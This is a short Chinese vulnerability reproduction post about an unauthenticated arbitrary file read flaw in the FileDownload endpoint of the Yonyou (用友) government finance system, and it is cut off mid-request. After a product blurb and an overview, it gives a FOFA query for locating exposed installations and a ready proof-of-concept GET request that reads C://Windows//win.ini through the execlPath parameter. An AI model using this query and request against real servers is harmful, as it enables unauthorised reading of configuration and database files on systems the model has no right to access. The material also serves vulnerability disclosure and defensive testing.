0x01 产品简介

用友政务财务系统具有多项核心功能，旨在满足各类组织的财务管理需求。首先，它提供了财务核算功能，能够全面管理企业的总账、固定资产、现金、应付应收等模块，实时掌握企业的财务状况，并通过科目管理、凭证处理、报表分析等功能为决策提供有力支持。

0x02 漏洞概述

用友政务财务系统 FileDownload 接口存在任意文件读取漏洞，未经身份攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。

0x03 复现环境

FOFA：

app="用友-政务财务系统" || body="/df/portal/getYearRgcode.do"

0x04 漏洞复现 

PoC

GET /bg/attach/FileDownload?execlPath=C://Windows//win.ini  HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signe